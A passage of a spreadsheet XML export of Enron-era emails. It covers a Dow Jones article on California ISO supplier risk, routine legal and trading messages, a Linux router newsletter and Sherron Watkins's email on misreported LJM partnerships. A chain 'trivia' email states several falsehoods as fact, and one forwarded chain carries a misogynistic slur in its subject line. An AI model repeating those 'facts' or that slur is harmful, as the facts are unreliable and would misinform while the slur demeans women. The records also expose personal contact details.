when it can't find electric supplies, Reliant Energy's (REI) vice president_x000D_
       for western U.S. trading, Reggie Howard, said Friday. _x000D_
_x000D_
       Suppliers are concerned about the ISO's financial guarantees from the _x000D_
investor-owned utilities, for whom it buys: Edison International (EIX),_x000D_
       PG&amp;E Corp. (PCG) and Sempra Energy (SRE). _x000D_
_x000D_
       PowerEx, the power marketing unit of provincial utility BC Hydro, _x000D_
demanded letters of credit from the utilities for ISO purchases this week._x000D_
       Edison complied, while PG&amp;E refused. Sempra said that the state of _x000D_
California should make the guarantee as part of a declared state of_x000D_
       emergency. _x000D_
_x000D_
       Reliant is looking at the ISO credit issue, but so far has demanded no _x000D_
such letters of guarantee, Howard said. _x000D_
_x000D_
       Other risks in selling to the ISO include the possibility that state _x000D_
politicians will tell the ISO not to pay its bills. _x000D_
_x000D_
       "when you have state Sen. Steve Peace telling San Diego residents not _x000D_
to pay their electric bills two months ago, you worry about what_x000D_
       might be said to the ISO. There are political risks," Howard said in _x000D_
an interview with Dow Jones Newswires. Peace, a democrat from the_x000D_
       San Diego area, is chairman of the California Senate Budget Committee. _x000D_
_x000D_
       Suppliers also risk that prices on sales to the ISO could be reviewed _x000D_
by the Federal Energy Regulatory Commission anytime 24 months_x000D_
       after the transaction occurs, under the proposed FERC order on _x000D_
California. Prices could be lowered retroactively, and refunds from the_x000D_
       suppliers could be ordered. Sales to other western utilities face no _x000D_
such review. _x000D_
_x000D_
       Taken together, these risks have forced the ISO to pay a premium of at _x000D_
least 10% more than market prices, according to several traders_x000D_
       attending the Day of the Trader industry conference in Las Vegas _x000D_
Thursday and Friday. _x000D_
_x000D_
       "It could be 5% or 20%. We have a number, but we won't disclose it _x000D_
because that's proprietary," Howard said. _x000D_
_x000D_
       Reliant, which has 3,800 megawatts of generators in California, has no _x000D_
plans to build any more plants in the state. The company is_x000D_
       building a plant in Nevada, just east of the California border. The _x000D_
optimal location for any new plant, Howard said, is near California, but not_x000D_
       inside the state. _x000D_
_x000D_
       Howard said that Reliant isn't looking for offers to sell its _x000D_
California plants, but if a good offer came up, they would consider it. _x000D_
_x000D_
       -By Mark Golden, Dow Jones Newswires; 201-938-4604; _x000D_
mark.golden@dowjones.com </t>
  </si>
  <si>
    <t>Mon, 21 Feb 2000 10:02:00 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Final Four tickets</t>
  </si>
  <si>
    <t>I talked to Mary Lou on Thursday afternoon and she said that we were all set _x000D_
with tickets (6) in the box seats.  Does this sound correct?  Thanks for your _x000D_
help in getting these tickets.  Hope you had a good weekend._x000D_
Ben</t>
  </si>
  <si>
    <t>Mon, 26 Feb 2001 04:22:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mkierlanczyk@fmginy.com'})</t>
  </si>
  <si>
    <t>Re: Wicku! Zadeklarowalem sie do Molly, ze przyjade w niedziele</t>
  </si>
  <si>
    <t xml:space="preserve">Marek,_x000D_
_x000D_
Zadzwonie do Ciebie, zeby sie umowic na spotkanie._x000D_
_x000D_
Wicek_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Mark Kierlanczyk &lt;MKierlanczyk@fmginy.com&gt; on 02/22/2001 12:27:42 PM_x000D_
To: "'Vince.J.Kaminski@enron.com'" &lt;Vince.J.Kaminski@enron.com&gt;_x000D_
cc:  _x000D_
Subject: Wicku! Zadeklarowalem sie do Molly, ze przyjade w niedziele_x000D_
_x000D_
_x000D_
4 Marca choc spotkania sa na poniedzialek, 13ta 5 Marca. Mialem nadzieje, ze_x000D_
bede mial okazje Cie/ Was odwiedzic  ale poniewaz nie mialem okazji Cie_x000D_
spytac to niniejszym to czynie..._x000D_
_x000D_
Do milego - to ja_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 21 May 2001 06:13:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Proposals covering DWR costs</t>
  </si>
  <si>
    <t>Jeff:_x000D_
_x000D_
As you recall, during the call earlier today (8:30 am your time) Jim asked me _x000D_
to work with you on doing a comparision of how various proposals would cover _x000D_
DWR costs compared to the solution Enron advocates.   _x000D_
_x000D_
It wasn't clear to me if you already did this analysis as part of the _x000D_
core/non-core research you are doing.  Please let me know if additional _x000D_
research needs to be done, and, if so, let me know when a good time would be _x000D_
for me to call you to discuss in more detail._x000D_
_x000D_
Thanks, _x000D_
_x000D_
Jennifer_x000D_
713.345.3550</t>
  </si>
  <si>
    <t>EOL amendment</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Tana Jones/HOU/ECT on 02/05/2001 06:07 PM -----_x000D_
_x000D_
	Walter Guidroz@ENRON_x000D_
	02/05/2001 06:04 PM_x000D_
		 _x000D_
		 To: Karen Lambert/HOU/ECT@ECT, Tana Jones/HOU/ECT@ECT, Samuel _x000D_
Schott/HOU/ECT@ECT, Mark Taylor/HOU/ECT@ECT, Brant Reves/HOU/ECT@ECT, Debbie _x000D_
R Brackett/HOU/ECT@ECT, David Hardy/LON/ECT@ECT, Lesli Campbell/HOU/ECT@ECT, _x000D_
Cynthia Clark/Corp/Enron@ENRON, Mary G Gosnell/HOU/ECT@ECT, Enron Europe _x000D_
Global Contracts and Facilities, Enron Europe Global _x000D_
CounterParty/LON/ECT@ECT, Stephanie Sever/HOU/ECT@ECT, Tom Moran/HOU/ECT@ECT, _x000D_
Claudia Clark/HOU/ECT@ECT, William S Bradford/HOU/ECT@ECT, Lisa _x000D_
Lees/HOU/ECT@ECT, Juana Fayett/Corp/Enron@Enron, Jana Morse/Corp/Enron@Enron, _x000D_
Trang Le/HOU/ECT@ECT, Paul Maley/LON/ECT@ECT, Sonya Clarke/LON/ECT@ECT, Lee _x000D_
Munden/LON/ECT@ECT, Tim Davies/LON/ECT@ECT, Karen O'Day/NA/Enron@Enron, Tanya _x000D_
Rohauer/HOU/ECT@ECT, Kelly Lombardi/NA/Enron@Enron, Brian Lindsay/Enron _x000D_
Communications@Enron Communications_x000D_
		 cc: _x000D_
		 Subject: EOL amendment_x000D_
_x000D_
Please see attached._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 1 May 2001 11:46:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thought you knew everything</t>
  </si>
  <si>
    <t xml:space="preserve">THOUGHT YOU KNEW EVERYTHING?_x000D_
_x000D_
1. Rubber bands last longer when refrigerated._x000D_
2. Peanuts are one of the ingredients in dynamite._x000D_
3. There are 293 ways to make change for a dollar._x000D_
4. The average person's left hand does 56% of the typing._x000D_
5. A shark is the only fish that can blink with both eyes._x000D_
6. There are more chickens than people in the world._x000D_
7. Two thirds of the world's eggplant is grown in New Jersey._x000D_
8. The longest one syllable word in the English language is screeched."_x000D_
9. On a Canadian two dollar bill, the flag flying over the Parliament_x000D_
building is an American flag._x000D_
10. All of the clocks in the movie "Pulp Fiction" are stuck on 4:20._x000D_
11. No word in the English language rhymes with month, orange, silver, or_x000D_
purple._x000D_
12. "Dreamt" is the only English word that ends in the letters "mt"._x000D_
13. All 50 states are listed across the top of the Lincoln Memorial on the_x000D_
back of the $5 bill._x000D_
14. Almonds are a member of the peach family._x000D_
15. Winston Churchill was born in a ladies' room during a dance._x000D_
16. Maine is the only state whose name is just one syllable._x000D_
17. There are only four words in the English language which and in "dous":_x000D_
tremendous, horrendous, stupendous, and . . . (Can you think of the fourth_x000D_
one? The answer awaits at the end of this email)._x000D_
18. Los Angeles' full name is "El Pueblo de Nuestra Senora la Reina de los_x000D_
Angeles de Porciuncula"_x000D_
19. A cat has 32 muscles in each ear._x000D_
20. An ostrich's eye is bigger than its brain._x000D_
21. Tigers have striped skin, not just striped fur._x000D_
22. In most advertisements, the time displayed on a watch is 10:10._x000D_
23. Al Capone's business card said he was a used furniture dealer._x000D_
24. The characters Bert and Ernie on Sesame Street were named after Bert the_x000D_
cop and Ernie the taxi driver in Frank Capra's "It's a Wonderful Life."_x000D_
25. A dragonfly has a life span of 24 hours._x000D_
26. A goldfish has a memory span of three seconds._x000D_
27. A dime has 118 ridges around the edge._x000D_
28. It's impossible to sneeze with your eyes open. (DON'T try this at home)!_x000D_
29. The giant squid has the largest eyes in the world._x000D_
30. In England, the Speaker of the House is not allowed to speak._x000D_
31. The microwave was invented after a researcher walked by radar tube and a_x000D_
chocolate bar melted in his pocket._x000D_
32. Mr. Rogers is an ordained minister._x000D_
33. The average person falls asleep in seven minutes._x000D_
34. There are 336 dimples on a regulation golf ball._x000D_
35. "Stewardesses" is the longest word that is typed with only the left_x000D_
hand._x000D_
_x000D_
And here's the answer to those 4 "dous" words; tremendous, horrendous,_x000D_
stupendous and hazardous ..... NOW YOU KNOW EVERYTHING_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 9 Mar 2000 03:09:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Thinking with Linux</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 03/09/2000=_x000D_
=20_x000D_
11:09 AM ---------------------------_x000D_
_x000D_
_x000D_
"NW on Linux" &lt;Linux@bdcimail.com&gt; on 03/09/2000 01:11:14 AM_x000D_
Please respond to "Linux Help" &lt;NWReplies@bellevue.com&gt;_x000D_
To: &lt;vkamins@enron.com&gt;_x000D_
cc: =20_x000D_
Subject: Thinking with Linux_x000D_
_x000D_
_x000D_
NETWORK WORLD FUSION FOCUS: PHIL HOCHMUTH_x000D_
on LINUX_x000D_
Today's focus: Thinking outside the (server) box with Linux_x000D_
03/08/00_x000D_
_x000D_
Dear Wincenty Kaminski,_x000D_
_x000D_
Today's focus: Thinking outside the=20_x000D_
(server) box with Linux_x000D_
---------------------------------------------_x000D_
By Phil Hochmuth_x000D_
_x000D_
Welcome to the first Network World Fusion Focus newsletter on Linux in_x000D_
the enterprise. With the mountains of information available about Linux,_x000D_
it can be hard for network professionals to keep up with Linux news that_x000D_
is fresh and relevant to their jobs. Here each week, you will find Linux_x000D_
industry news, tips and examples of how Linux is being used in_x000D_
enterprise networks.  Jumping right in, this week=01,s topic will focus on_x000D_
how Linux can be used to turn an old PC into a network router._x000D_
_x000D_
When people talk about a Linux box, what generally comes to mind is_x000D_
either a server or client machine running some distribution of Linux._x000D_
One way for users to use Linux outside =01&amp;the box=018 is with the Linux_x000D_
Router Project=01,s distribution of the operating system._x000D_
_x000D_
The Linux Router Project (LRP) is a microdistribution of Linux (it fits_x000D_
on a 1.44M byte floppy) that can be used along with some extra hardware_x000D_
to turn a variety of low-end PCs into practical, useable network gear._x000D_
Additionally, as with most Linux distributions, the software is free._x000D_
_x000D_
A variety of different network devices can be put together using LRP._x000D_
For instance, using just an Intel 486 PC with a floppy drive, 12M bytes_x000D_
of RAM and at least two network interface cards, LRP can be used to_x000D_
assemble a 10M bit/sec Ethernet router. For higher speeds, a Fast_x000D_
Ethernet router can be assembled with a simple Pentium 100 or higher,_x000D_
along with 16M bytes of RAM and 10/100M bit/sec network interface cards._x000D_
LRP can also be configured as a secondary Domain Name System firewall, a_x000D_
Remote Authentication Dial-In User Service and a WAN router with DSU_x000D_
functionality. LRP routers support standard routing protocols, such as_x000D_
Routing Information Protocol and Open Shortest Path First. Advanced_x000D_
routing protocols are also supported, such as IPX for NetWare networks_x000D_
and Token Ring._x000D_
_x000D_
Building a Linux router out of spare parts can be useful when setting up_x000D_
a testing environment that requires the simulation of live router_x000D_
traffic. It=01,s also more practical than disconnecting your live_x000D_
commercial routing equipment for use in testing purposes. LRP can also_x000D_
be put into a live production environment as a way to add extra routers_x000D_
to a network for a minimal cost._x000D_
_x000D_
Because Linux routers can be built with standard PC components, the_x000D_
materials to build one are likely sitting in a storage room or back_x000D_
closet somewhere in your office. LRP is a completely free, open source_x000D_
operating system  so if you can program, you can add functions such as_x000D_
Multi-protocol Label Switching and load balancing to the router by_x000D_
writing customized code._x000D_
_x000D_
If you are not a Linux hacker, odds are someone else has already written_x000D_
the code for these types of functions. Start at_x000D_
http://www.linuxsupportline.com_x000D_
to find these kinds of modules. As with many free software products,_x000D_
your best source of support for LRP will be the Web. An extensive list_x000D_
of FAQs and tips on using LRP can be found at_x000D_
http://www.linuxrouter.org/faq._x000D_
_x000D_
Since LRP is developed and distributed mostly by volunteers, download_x000D_
access to the software is not always very fast. The easiest way to get_x000D_
it is to log on to http://www.linux-howto.com, which has a search engine_x000D_
for Linux documentation and free distributions. Type in =01&amp;Linux Router=01=_x000D_
8_x000D_
in the search field, and it will let you choose what geographical region_x000D_
to download the LRP software and source code from for optimal speed. You_x000D_
can also try several of these mirror sites to download LRP:_x000D_
_x000D_
ftp://ftp.cpwright.com/linux-router/_x000D_
ftp://lrp.rutgers.edu/pub/linux/distributions/linux-router/_x000D_
ftp://sunsite.unc.edu/pub/Linux/distributions/linux-router/_x000D_
ftp://ftp.xtdnet.nl/pub/linux/linux-router/_x000D_
ftp://sunsite.ktu.lt/pub/linux/distributions/linux-router/_x000D_
ftp://mirror.aarnet.edu.au/pub/linux/linux-router/_x000D_
ftp://ftp.clear.net.nz/pub/linux-router/_x000D_
ftp://mailtrans.sote.hu/linuxrouter/_x000D_
ftp://ftp.di.fct.unl.pt/pub/linux/linux-router/_x000D_
ftp://ftp.wipol.uni-bonn.de/pub/mirror/ftp.linuxrouter_x000D_
_x000D_
To contact Phil Hochmuth:_x000D_
-------------------------_x000D_
Phil Hochmuth is a writer and researcher for Network World, and a former_x000D_
systems integrator. You can reach him at mailto:phochmut@nww.com._x000D_
_x000D_
*********************************************************_x000D_
Subscription Services_x000D_
_x000D_
To subscribe or unsubscribe to any Network World e-mail newsletters,_x000D_
go to:_x000D_
http://www.nwwsubscribe.com/news/scripts/notprinteditnews.asp_x000D_
_x000D_
To change your email address, go to:_x000D_
http://www.nwwsubscribe.com/news/scripts/changeemail.asp_x000D_
_x000D_
Subscription questions? Contact Customer Service by replying to this_x000D_
message._x000D_
_x000D_
Other Questions/Comments_x000D_
_x000D_
Have editorial comments? Write Jeff Caruso, Newsletter Editor, at:_x000D_
mailto:jcaruso@nww.com_x000D_
_x000D_
For advertising information, write Jamie Kalbach, Account Executive,_x000D_
at: mailto:jkalbach@nww.com_x000D_
_x000D_
Network World Fusion is part of IDG.net, the IDG Online Network._x000D_
IT All Starts Here:_x000D_
http://www.idg.com_x000D_
_x000D_
Copyright Network World, Inc., 2000_x000D_
</t>
  </si>
  <si>
    <t>Tue, 15 May 2001 00:13:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Viviana Florio</t>
  </si>
  <si>
    <t>I heard more about Viviana before I left London last week and apparently her _x000D_
concern she was'nt being properly guided or mentored- despite her apparent _x000D_
current performance and your  lack of time, I think we do owe her an action _x000D_
plan at mid-year at the latest and a decent opportunity to redeem herself. _x000D_
Please let me know how I can be of assistance. Thanks.</t>
  </si>
  <si>
    <t>Wed, 14 Nov 2001 19:07:29 -0800 (PST)</t>
  </si>
  <si>
    <t>SAVINGS PLAN TRANSITION PERIOD ENDS For All Employees who_x000D_
 Participate in the Enron Corp Savings Plan</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
The Savings Plan Transition Period Ends Early!_x000D_
_x000D_
We have been working closely with Hewitt Associates to get you access to your Savings Plan account before November 20 and are pleased to announce that the internet site went live as of 8:00 AM yesterday morning, November 13. _x000D_
_x000D_
Log on to benefits.enron.com and check out the new website - you will enjoy the new features._x000D_
_x000D_
Once again, we have appreciated your patience during the transition period.  _x000D_
_x000D_
EnronBenefits . . . keeping pace with your lifestyle._x000D_
</t>
  </si>
  <si>
    <t>Thu, 7 Dec 2000 10:36:00 -0800 (PST)</t>
  </si>
  <si>
    <t>GE Consent to Assignment</t>
  </si>
  <si>
    <t>Annoyed again_x000D_
_x000D_
----- Forwarded by Roseann Engeldorf/Corp/Enron on 12/07/2000 06:36 PM -----_x000D_
_x000D_
	"Taylor, Rob" &lt;robtaylor@akllp.com&gt;_x000D_
	11/24/2000 12:38 PM_x000D_
		 _x000D_
		 To: &lt;kent.shoemaker@ps.ge.com&gt;, &lt;michael.barnas@ps.ge.com&gt;, _x000D_
&lt;stephen.swift@ps.ge.com&gt;_x000D_
		 cc: &lt;sheila.tweed@enron.com&gt;, &lt;roseann.engeldorf@enron.com&gt;, _x000D_
&lt;kay.mann@enron.com&gt;_x000D_
		 Subject: GE Consent to Assignment_x000D_
_x000D_
_x000D_
Attached is a draft of the Consent to Assignment and Agreement relating_x000D_
to the transfer of certain turbine contracts into the TurboPark_x000D_
structure.  Please note that the attached is being distributed in_x000D_
advance of review by Enron and remains subject to its comments in every_x000D_
respect._x000D_
_x000D_
Regards, &lt;&lt;GE Consent to Assignment.DOC&gt;&gt;_x000D_
_x000D_
Rob Taylor_x000D_
Andrews &amp; Kurth L.L.P._x000D_
600 Travis Street_x000D_
Suite 4200_x000D_
Houston, Texas  77002_x000D_
_x000D_
Tel: (713) 220-4436_x000D_
Fax: (713) 238-7273_x000D_
e-mail: robtaylor@andrews-kurth.com_x000D_
_x000D_
This e-mail is privileged and confidential and is intended only for the_x000D_
recipient(s) named above.  If you are not the intended recipient, please_x000D_
(i) do not read, copy, use or disclose the contents hereof to others_x000D_
(any of the foregoing being strictly prohibited), (ii) notify the sender_x000D_
immediately of your receipt hereof, and (iii) delete this e-mail and all_x000D_
copies of it._x000D_
_x000D_
 - GE Consent to Assignment.DOC</t>
  </si>
  <si>
    <t>Tue, 27 Jun 2000 02:44:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'tana.jones@enron.com', 'sara.shackleton@enron.com', 'susan.flynn@enron.com', 'carol.clair@enron.com', 'jason.peters@enron.com', 'samantha.boyd@enron.com', 'mary.cook@enron.com', 'susan.bailey@enron.com', 'mark.taylor@enron.com'})</t>
  </si>
  <si>
    <t>Susan Flynn will be in late this a.m.  She had a migrane last_x000D_
 night.</t>
  </si>
  <si>
    <t xml:space="preserve">Susan </t>
  </si>
  <si>
    <t>Thu, 25 Oct 2001 12:42:38 -0700 (PDT)</t>
  </si>
  <si>
    <t>Marie:_x000D_
Nothing with or pertaining to Metron or Primary Steel to the best of my knowledge._x000D_
Kay_x000D_
_x000D_
Kay Young_x000D_
Legal Specialist_x000D_
Enron North America Corp._x000D_
Ph:   713-853-6794_x000D_
Fax: 713-646-3393_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Heard, Marie  _x000D_
Sent:	Thursday, October 25, 2001 2:34 PM_x000D_
To:	Young, Kay_x000D_
Subject:	FW: Confidentiality Agreement_x000D_
_x000D_
Do we have a conflict?  The CA will be to obtain financials._x000D_
_x000D_
Thanks!_x000D_
_x000D_
Marie_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Phillips, Rebecca  _x000D_
Sent:	Thursday, October 25, 2001 1:42 PM_x000D_
To:	Heard, Marie; Panus, Stephanie_x000D_
Subject:	Confidentiality Agreement_x000D_
_x000D_
Could you please together a confidentiality agreement for the following company:_x000D_
_x000D_
Metron Steel, a dba of Primary Steel, Inc._x000D_
_x000D_
Please let me know if you need anything else. _x000D_
Thanks,_x000D_
r</t>
  </si>
  <si>
    <t>Thu, 25 Oct 2001 09:46:28 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'james.derrick@enron.com', 'j..kean@enron.com'})</t>
  </si>
  <si>
    <t>FW: Erroneous press</t>
  </si>
  <si>
    <t>_x000D_
FYI.  I am definitely not responding to this_x000D_
 -----Original Message-----_x000D_
From: 	Watkins, Sherron  _x000D_
Sent:	Thursday, October 25, 2001 11:30 AM_x000D_
To:	Koenig, Mark; Palmer, Mark A. (PR)_x000D_
Cc:	McMahon, Jeffrey_x000D_
Subject:	Erroneous press_x000D_
_x000D_
Mark, I'm sure you are aware of the comments in the press that I have copied and inserted here below.  There have been others that are similar.  Basically, the press is reporting that we have dissolved the LJM partnerships, ended all relationships with the LJM entities, etc.  All that we have done is unwind the raptor entities, LJM still exists, all other transactions with LJM still exist, it's just that Andy sold his interest in the partnerships.  Michael Kopper owns them and would probably be considered a "friend of Enron" by investors/journalists._x000D_
_x000D_
I'm concerned about our efforts to build back investor confidence - do we correct the press?  how do we address this?  I'm concerned that we will once again be hit with credibility concerns when the press or investors fully understand that LJM still exists and we have deals still pending with it and have deals still in place with it.  How do we correct this erroneous press?   Sherron Watkins_x000D_
_x000D_
Excerpts:_x000D_
"Enron  has been under fire since last week as questions have surfaced about its accounting practices, especially in regard to two limited partnerships created by Fastow in 1999 and since dissolved. ...." By Lisa Sanders , CBS.MarketWatch.com_x000D_
Last Update: 10:05 AM ET Oct. 25, 2001_x000D_
"...So Fastow, in June, resigned his roles at the partnerships and Enron also ended its relationships with the LJM entities." Houston Chronicle article from today._x000D_
_x000D_
_x000D_
Sherron S. Watkins_x000D_
Vice President, Enron Corp._x000D_
713-345-8799 office_x000D_
713-416-0620 cell</t>
  </si>
  <si>
    <t>Wed, 7 Mar 2001 02:13:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Kate,_x000D_
What's the status of these two deals?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
   Kate Symes @ ECT                03/06/2001 05:41 PM_x000D_
_x000D_
To: Evelyn Metoyer/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: 3/06/ Checkout  _x000D_
_x000D_
Evelyn, I'm so sorry I haven't found these deals yet! I've left messages with _x000D_
Mike Swerzbin and Matt Motley, but I don't see these trades in either of _x000D_
their logs - or even in the short term trade logs. One of those guys should _x000D_
be back in the office momentarily, and I'll let you know when I've talked to _x000D_
them._x000D_
_x000D_
Kate_x000D_
_x000D_
_x000D_
_x000D_
Evelyn Metoyer@ENRON_x000D_
03/06/2001 03:15 PM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: 3/06/ Checkout_x000D_
_x000D_
_x000D_
_x000D_
Amerex West_x000D_
All deals checked out fine._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Bloomberg_x000D_
All deals checked out fine._x000D_
_x000D_
_x000D_
Prebon_x000D_
_x000D_
Mike Swerbin_x000D_
I am missing the following deals:_x000D_
Enron buys from PGET 25 mw of May PV at $272_x000D_
Enron sells to EES 25 mw of May PV at $268._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 17 May 2001 12:51:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'trasnic@ou.edu'})</t>
  </si>
  <si>
    <t>Re: Arrival of Reid Pierson Rasnic</t>
  </si>
  <si>
    <t>congrats.  see you next year._x000D_
m</t>
  </si>
  <si>
    <t>Tue, 4 Sep 2001 11:16:25 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Compression Administration Agreement bet Enron Midstream and_x000D_
 MTG Operating</t>
  </si>
  <si>
    <t>Sorry about the delay.  I have just been covered up.  Here it is._x000D_
_x000D_
 _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Flanigan, Tricia  _x000D_
Sent:	Tuesday, September 04, 2001 1:06 PM_x000D_
To:	Nemec, Gerald_x000D_
Cc:	Mathews, Bill; Legler, Michael J._x000D_
Subject:	Compression Administration Agreement bet Enron Midstream and MTG Operating _x000D_
_x000D_
Mr. Nemec -_x000D_
_x000D_
This email is a follow-up to my voice message to you last week regarding the above-referenced document.  I work with Bill Mathews in the Denver office and we are preparing a compression administration agreement between Bear Paw Energy and Independent Production.  We are working off of your agreement and I was wondering if you could email me (tricia.flanigan@enron.com) the above-referenced agreement._x000D_
_x000D_
If you have any questions, please do not hesitate to call me at 720-946-3661._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Patricia Flanigan_x000D_
Bear Paw Energy, LLC_x000D_
1400 16th Street, Suite 310_x000D_
Denver CO  80202_x000D_
720-946-3661</t>
  </si>
  <si>
    <t>Thu, 6 Jul 2000 03:36:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>WACOG 06/00 Prod</t>
  </si>
  <si>
    <t xml:space="preserve">here is the WACOG Delma.  Cathy could you add her to the email.  Thanks._x000D_
PL_x000D_
_x000D_
---------------------- Forwarded by Phillip M Love/HOU/ECT on 07/06/2000 _x000D_
10:32 AM ---------------------------_x000D_
_x000D_
_x000D_
Cathy De La Torre_x000D_
07/06/2000 10:32 AM_x000D_
To: Eric Francis Calub/HOU/ECT@ECT, Troy Klussmann/HOU/ECT@ECT, Mechelle _x000D_
Stevens/HOU/ECT@ECT, Rhonda Robinson/HOU/ECT@ECT, John Valdes/HOU/ECT@ECT, _x000D_
Mary Theresa Franklin/HOU/ECT@ECT, Melba A Bowen/HOU/ECT@ECT, Shannon _x000D_
Carmichael/HOU/ECT@ECT, Becky Pitre/HOU/ECT@ECT, Kristen J _x000D_
Hanson/HOU/ECT@ECT, Phillip M Love/HOU/ECT@ECT, Gary A Hanks/HOU/ECT@ECT, _x000D_
Eric Francis Calub/HOU/ECT@ECT, Jennifer D Pattison/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: WACOG 06/00 Prod_x000D_
_x000D_
 _x000D_
</t>
  </si>
  <si>
    <t>Thu, 10 May 2001 18:45:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: slut......serves her right haha</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
---------------------- Forwarded by Matthew Lenhart/HOU/ECT on 05/10/2001 03:45 PM ---------------------------_x000D_
_x000D_
_x000D_
"SoRelle, Andrea L" &lt;ASoRelle@h-s.com&gt; on 05/10/2001 02:39:15 PM_x000D_
To:	"'Amy Clemons'" &lt;amy.clemons@enron.com&gt;, "'Anne'" &lt;anneyows@hotmail.com&gt;, "'Brad'" &lt;bradf@inqueststaffing.com&gt;, "'Caroline'" &lt;carolinehead@hotmail.com&gt;, "'Karen'" &lt;k1p1@aol.com&gt;, "'kriscameron@deloitte.com'" &lt;kriscameron@deloitte.com&gt;, "'Marcy'" &lt;marcyrinehart@hotmail.com&gt;, "'Maggie work'" &lt;mbeery@hillandknowlton.com&gt;, "'Matthew.Lenhart@enron.com'" &lt;Matthew.Lenhart@enron.com&gt;, "'Rachel'" &lt;rachelarriola@yahoo.com&gt;, "'Ritter, Robert H.'" &lt;rhritter@utmb.edu&gt;, "'Tara Levinthal'" &lt;tlevinthal@aol.com&gt;, "Pechersky, Svetlana" &lt;SPechersky@h-s.com&gt;, "Cohlmeyer, Lisa M" &lt;LCohlmeyer@h-s.com&gt;, "'Shirley Elliott'" &lt;shirley.s.elliott@citicorp.com&gt;, "'Holly Korman'" &lt;holly@layfam.com&gt;, "'MATTOSO, ANGELA'" &lt;Amattoso@mdck.com&gt;, "'SAM'" &lt;missshy@texas.net&gt;_x000D_
cc:	 _x000D_
_x000D_
Subject:	FW: slut......serves her right haha_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Stephanie_E_Friedman@reliantenergy.com_x000D_
[mailto:Stephanie_E_Friedman@reliantenergy.com]_x000D_
Sent: Thursday, May 10, 2001 2:12 PM_x000D_
To: ellie.bullard@mail.house.gov; christina@gulfcoastentertainment.com;_x000D_
lacyprice@henrysmiller.com; kawise@hotmail.com; kafriedman@hotmail.com;_x000D_
courtneyb@johndaugherty.com; emily1009@yahoo.com;_x000D_
elizabeth_bowen@aimfunds.com; abradford28@hotmail.com;_x000D_
alexa_carter@aimfunds.com; abradford28@hotmail.com;_x000D_
laurasperry@excelonline.com; asorelle@h-s.com; MBowen1025@aol.com;_x000D_
mgockturtle@mail.utexas.edu; allison.f.blanton@vanderbilt.edu;_x000D_
AMcGee@thealexandergroup.com; BWare@rnchq.org;_x000D_
christine_lawhon@amsinc.com; caledere@TexasChildrensHospital.org;_x000D_
c.domercq@worldnet.att.net; erin.e.fowler@us.arthurandersen.com;_x000D_
hbuche@kingadvisors.com; jana.m.dupree@us.arthurandersen.com;_x000D_
jennspinks@aol.com; jsiff@central.uh.edu; jwunz@ncta.com;_x000D_
lara.wright@bakerhughes.com; laurasperry@excelonline.com;_x000D_
mbeery@HillandKnowlton.com; mmalone@loomissayles.com;_x000D_
ssemple@SicolaMartin.com_x000D_
Subject: slut......serves her right haha_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Stephanie E. Friedman_x000D_
Corporate Tax Department_x000D_
Stephanie_E_Friedman@reliantenergy.com_x000D_
(713) 207-3084_x000D_
----- Forwarded by Stephanie E Friedman/ADM/HouInd on 05/10/01 02:08 PM_x000D_
-----_x000D_
_x000D_
_x000D_
                    gemma.moore@us.an_x000D_
_x000D_
                    dersen.com               To:_x000D_
Stephanie_E_Friedman@reliantenergy.com_x000D_
                                             cc:_x000D_
amanda.gaskin@us.andersen.com,_x000D_
                    05/10/01 02:06 PM        carrie.a.henke@us.andersen.com,_x000D_
_x000D_
                                             mgmateer@yahoo.com,_x000D_
_x000D_
_x000D_
silvia.c.melendez@us.andersen.com,_x000D_
                                             Rabitbear2@aol.com,_x000D_
Bear4242@aol.com,_x000D_
                                             ksm_00_99@yahoo.com,_x000D_
_x000D_
_x000D_
leticia.ramirez@us.andersen.com,_x000D_
_x000D_
meredith.riekert@us.pwcglobal.com,_x000D_
                                             haley.c.smith@us.andersen.com,_x000D_
_x000D_
                                             wallace_ashley@hotmail.com_x000D_
_x000D_
                                             Subject:     slut......serves_x000D_
her right haha_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
(See attached file: leopard.jpg)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
*******************Internet Email Confidentiality Footer*******************_x000D_
_x000D_
_x000D_
Privileged/Confidential Information may be contained in this message.  If_x000D_
you_x000D_
are not the addressee indicated in this message (or responsible for_x000D_
delivery of_x000D_
